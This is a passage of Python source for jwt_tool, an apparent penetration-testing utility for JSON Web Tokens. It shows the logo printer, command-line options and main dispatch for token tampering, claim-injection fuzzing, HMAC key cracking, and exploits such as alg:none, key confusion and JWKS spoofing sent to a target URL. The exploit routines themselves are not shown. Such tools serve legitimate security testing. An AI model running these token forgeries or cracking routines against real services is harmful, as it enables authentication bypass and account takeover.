\x1b[0m\x1b[48;5;24m \x1b[0m\\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\ ") print(" \\__\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\\__\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m __| \\__\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m __| \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") print(" \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") print(" \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m __\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m __\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") print("\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\ \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m _\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") print("\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m / \\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") print("\\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m / \\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m | \x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\\\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m |") print(" \\______/ \\__/ \\__| \\__|\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\x1b[48;5;24m \x1b[0m\\__| \\______/ \\______/ \\__|") print(" \x1b[36mVersion "+jwttoolvers+" \x1b[0m \\______| \x1b[36m@ticarpi\x1b[0m ") print() if __name__ == '__main__': parser = argparse.ArgumentParser(epilog="If you don't have a token, try this one:\neyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po", formatter_class=argparse.RawTextHelpFormatter) parser.add_argument("jwt", nargs='?', type=str, help="the JWT to tinker with (no need to specify if in header/cookies)") parser.add_argument("-b", "--bare", action="store_true", help="return TOKENS ONLY") parser.add_argument("-t", "--targeturl", action="store", help="URL to send HTTP request to with new JWT") parser.add_argument("-r", "--request", action="store", help="URL request to base on") parser.add_argument("-i", "--insecure", action="store_true", help="Use HTTP for passed request") parser.add_argument("-rc", "--cookies", action="store", help="request cookies to send with the forged HTTP request") parser.add_argument("-rh", "--headers", action="append", help="request headers to send with the forged HTTP request (can be used multiple times for additional headers)") parser.add_argument("-pd", "--postdata", action="store", help="text string that contains all the data to be sent in a POST request") parser.add_argument("-cv", "--canaryvalue", action="store", help="text string that appears in response for valid token (e.g. \"Welcome, ticarpi\")") parser.add_argument("-np", "--noproxy", action="store_true", help="disable proxy for current request (change in jwtconf.ini if permanent)") parser.add_argument("-nr", "--noredir", action="store_true", help="disable redirects for current request (change in jwtconf.ini if permanent)") parser.add_argument("-M", "--mode", action="store", help="Scanning mode:\npb = playbook audit\ner = fuzz existing claims to force errors\ncc = fuzz common claims\nat - All Tests!") parser.add_argument("-X", "--exploit", action="store", help="eXploit known vulnerabilities:\na = alg:none\nn = null signature\nb = blank password accepted in signature\ns = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\nk = key confusion (specify public key with -pk)\ni = inject inline JWKS") parser.add_argument("-ju", "--jwksurl", action="store", help="URL location where you can host a spoofed JWKS") parser.add_argument("-S", "--sign", action="store", help="sign the resulting token:\nhs256/hs384/hs512 = HMAC-SHA signing (specify a secret with -k/-p)\nrs256/rs384/hs512 = RSA signing (specify an RSA private key with -pr)\nes256/es384/es512 = Elliptic Curve signing (specify an EC private key with -pr)\nps256/ps384/ps512 = PSS-RSA signing (specify an RSA private key with -pr)") parser.add_argument("-pr", "--privkey", action="store", help="Private Key for Asymmetric crypto") parser.add_argument("-T", "--tamper", action="store_true", help="tamper with the JWT contents\n(set signing options with -S or use exploits with -X)") parser.add_argument("-I", "--injectclaims", action="store_true", help="inject new claims and update existing claims with new values\n(set signing options with -S or use exploits with -X)\n(set target claim with -hc/-pc and injection values/lists with -hv/-pv") parser.add_argument("-hc", "--headerclaim", action="append", help="Header claim to tamper with") parser.add_argument("-pc", "--payloadclaim", action="append", help="Payload claim to tamper with") parser.add_argument("-hv", "--headervalue", action="append", help="Value (or file containing values) to inject into tampered header claim") parser.add_argument("-pv", "--payloadvalue", action="append", help="Value (or file containing values) to inject into tampered payload claim") parser.add_argument("-C", "--crack", action="store_true", help="crack key for an HMAC-SHA token\n(specify -d/-p/-kf)") parser.add_argument("-d", "--dict", action="store", help="dictionary file for cracking") parser.add_argument("-p", "--password", action="store", help="password for cracking") parser.add_argument("-kf", "--keyfile", action="store", help="keyfile for cracking (when signed with 'kid' attacks)") parser.add_argument("-V", "--verify", action="store_true", help="verify the RSA signature against a Public Key\n(specify -pk/-jw)") parser.add_argument("-pk", "--pubkey", action="store", help="Public Key for Asymmetric crypto") parser.add_argument("-jw", "--jwksfile", action="store", help="JSON Web Key Store for Asymmetric crypto") parser.add_argument("-Q", "--query", action="store", help="Query a token ID against the logfile to see the details of that request\ne.g. -Q jwttool_46820e62fe25c10a3f5498e426a9f03a") parser.add_argument("-v", "--verbose", action="store_true", help="When parsing and printing, produce (slightly more) verbose output.") args = parser.parse_args() if not args.bare: printLogo() try: path = os.path.expanduser("~/.jwt_tool") if not os.path.exists(path): os.makedirs(path) except: path = sys.path[0] logFilename = path+"/logs.txt" configFileName = path+"/jwtconf.ini" config = configparser.ConfigParser() if (os.path.isfile(configFileName)): config.read(configFileName) else: cprintc("No config file yet created.\nRunning config setup.", "cyan") createConfig() if config['services']['jwt_tool_version'] != jwttoolvers: cprintc("Config file showing wrong version ("+config['services']['jwt_tool_version']+" vs "+jwttoolvers+")", "red") cprintc("Current config file has been backed up as '"+path+"/old_("+config['services']['jwt_tool_version']+")_jwtconf.ini' and a new config generated.\nPlease review and manually transfer any custom options you have set.", "red") os.rename(configFileName, path+"/old_("+config['services']['jwt_tool_version']+")_jwtconf.ini") createConfig() exit(1) with open(path+"/null.txt", 'w') as nullfile: pass findJWT = "" if args.request: port = '' with open(args.request, 'r') as file: first_line = file.readline().strip() method, first_line_remainder = first_line.split(' ', 1) url = first_line_remainder.split(' ', 1)[0] base_url = '' in_headers = True args.postdata = '' for line in file: line = line.strip() if not line: # Stop when reaching an empty line (end of headers) in_headers = False continue if in_headers: if line.lower().startswith('host:'): # Extract the host from the 'Host' header _, host = line.split(':', 1) host = host.strip() if ':' in host: host, port = host.split(':', 1) protocol = "http" if args.insecure else "https" base_url = f"{protocol}://{host}" elif line.lower().startswith('cookie:'): cookie = line.split(': ')[1] if not args.cookies: args.cookies = '' args.cookies += cookie else: # Don't add user agent field, otherwise 'jwt_tool' in user agent will not work if not line.lower().startswith('user-agent:'): if not args.headers: args.headers = [] args.headers.append(line) else: args.postdata += line if not port: url_object = urlparse(url) if url_object.port: port = str(url_object.port) absolute_url = urljoin(base_url + (':' + port if port else ''), url) args.targeturl = absolute_url if args.targeturl: if args.cookies or args.headers or args.postdata: jwt_count = 0 jwt_locations = [] if args.cookies and re.search(r'eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', args.cookies): jwt_count += 1 jwt_locations.append("cookie") if args.headers and re.search(r'eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', str(args.headers)): jwt_count += 1 jwt_locations.append("headers") if args.postdata and re.search(r'eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', str(args.postdata)): jwt_count += 1 jwt_locations.append("post data") if jwt_count > 1: cprintc("Too many tokens! JWT in more than one place: cookie, header, POST data", "red") exit(1) if args.cookies: try: if re.search(r'eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', args.cookies): config['argvals']['headerloc'] = "cookies" except: cprintc("Invalid cookie formatting", "red") exit(1) if args.headers: try: if re.search(r'eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', str(args.headers)): config['argvals']['headerloc'] = "headers" except: cprintc("Invalid header formatting", "red") exit(1) if args.postdata: try: if re.search(r'eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', str(args.postdata)): config['argvals']['headerloc'] = "postdata" except: cprintc("Invalid postdata formatting", "red") exit(1) searchString = " | ".join([ str(args.cookies), str(args.headers), str(args.postdata) ]) try: findJWT = re.search(r'eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', searchString)[0] except: cprintc("Cannot find a valid JWT", "red") cprintc(searchString, "cyan") exit(1) if args.query: jwt = searchLog(args.query) elif args.jwt: jwt = args.jwt cprintc("Original JWT: "+findJWT+"\n", "cyan") elif findJWT: jwt = findJWT cprintc("Original JWT: "+findJWT+"\n", "cyan") else: parser.print_usage() cprintc("No JWT provided", "red") exit(1) if args.mode: if args.mode not in ['pb','er', 'cc', 'at']: parser.print_usage() cprintc("\nPlease choose a scanning mode (e.g. -M pb):\npb = playbook\ner = force errors\ncc = fuzz common claims\nat = all tests", "red") exit(1) else: config['argvals']['scanMode'] = args.mode if args.exploit: if args.exploit not in ['a', 'n', 'b', 's', 'i', 'k']: parser.print_usage() cprintc("\nPlease choose an exploit (e.g. -X a):\na = alg:none\nn = null signature\nb = blank password accepted in signature\ns = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\nk = key confusion (specify public key with -pk)\ni = inject inline JWKS", "red") exit(1) else: config['argvals']['exploitType'] = args.exploit if args.sign: if args.sign not in ['hs256','hs384','hs512','rs256','rs384','rs512','es256','es384','es512','ps256','ps384','ps512']: parser.print_usage() cprintc("\nPlease choose a signature option (e.g. -S hs256)", "red") exit(1) else: config['argvals']['sigType'] = args.sign headDict, paylDict, sig, contents = validateToken(jwt) paylB64 = base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") config['argvals']['overridesub'] = "false" if args.targeturl: config['argvals']['targetUrl'] = args.targeturl.replace('%','%%') if args.cookies: config['argvals']['cookies'] = args.cookies if args.headers: config['argvals']['header'] = str(args.headers) if args.dict: config['argvals']['keyList'] = args.dict if args.keyfile: config['argvals']['keyFile'] = args.keyfile if args.password: config['argvals']['key'] = args.password if args.pubkey: config['crypto']['pubkey'] = args.pubkey if args.privkey: config['crypto']['privkey'] = args.privkey if args.jwksfile: config['crypto']['jwks'] = args.jwksfile if args.jwksurl: config['services']['jwksloc'] = args.jwksurl if args.payloadclaim: config['argvals']['payloadclaim'] = str(args.payloadclaim) if args.headerclaim: config['argvals']['headerclaim'] = str(args.headerclaim) if args.payloadvalue: config['argvals']['payloadvalue'] = str(args.payloadvalue) if args.headervalue: config['argvals']['headervalue'] = str(args.headervalue) if args.postdata: config['argvals']['postData'] = args.postdata if args.canaryvalue: config['argvals']['canaryvalue'] = args.canaryvalue if args.noproxy: config['services']['proxy'] = "False" if args.noredir: config['services']['redir'] = "False" if args.request: config['argvals']['request'] = args.request if not args.crack and not args.exploit and not args.verify and not args.tamper and not args.injectclaims: rejigToken(headDict, paylDict, sig) if args.sign: signingToken(headDict, paylDict) if args.injectclaims: injectionfile = "" newheadDict = headDict newpaylDict = paylDict if args.headerclaim: if not args.headervalue: cprintc("Must specify header values to match header claims to inject.", "red") exit(1) if len(args.headerclaim) != len(args.headervalue): cprintc("Amount of header values must match header claims to inject.", "red") exit(1) if args.payloadclaim: if not args.payloadvalue: cprintc("Must specify payload values to match payload claims to inject.", "red") exit(1) if len(args.payloadclaim) != len(args.payloadvalue): cprintc("Amount of payload values must match payload claims to inject.", "red") exit(1) if args.payloadclaim: for payloadclaim, payloadvalue in zip(args.payloadclaim, args.payloadvalue): if os.path.isfile(payloadvalue): injectionfile = ["payload", payloadclaim, payloadvalue] else: newpaylDict, newPaylB64 = injectpayloadclaim(payloadclaim, payloadvalue) paylB64 = newPaylB64 newContents = genContents(headDict, newpaylDict) headDict, paylDict, sig, contents = validateToken(newContents+"."+sig) if args.headerclaim: for headerclaim, headervalue in zip(args.headerclaim, args.headervalue): if os.path.isfile(headervalue): injectionfile = ["header", headerclaim, headervalue] else: newheadDict, newHeadB64 = injectheaderclaim(headerclaim, headervalue) newContents = genContents(newheadDict, paylDict) headDict, paylDict, sig, contents = validateToken(newContents+"."+sig) if injectionfile: if args.mode: cprintc("Fuzzing cannot be used alongside scanning modes", "red") exit(1) cprintc("Fuzzing file loaded: "+injectionfile[2], "cyan") with open(injectionfile[2], "r", encoding='utf-8', errors='ignore') as valLst: nextVal = valLst.readline() cprintc("Generating tokens from injection file...", "cyan") utf8errors = 0 wordcount = 0 while nextVal: if injectionfile[0] == "payload": newpaylDict, newPaylB64 = injectpayloadclaim(injectionfile[1], nextVal.rstrip()) newContents = genContents(headDict, newpaylDict) headDict, paylDict, sig, contents = validateToken(newContents+"."+sig) paylB64 = newPaylB64 elif injectionfile[0] == "header": newheadDict, newHeadB64 = injectheaderclaim(injectionfile[1], nextVal.rstrip()) newContents = genContents(newheadDict, paylDict) headDict, paylDict, sig, contents = validateToken(newContents+"."+sig) injectOut(newheadDict, newpaylDict) nextVal = valLst.readline() exit(1) else: if not args.mode: injectOut(newheadDict, newpaylDict) exit(1) if args.mode: if not config['argvals']['targeturl'] and not args.bare: cprintc("No target secified (-t), cannot scan offline.", "red") exit(1) runScanning() runActions() exit(1)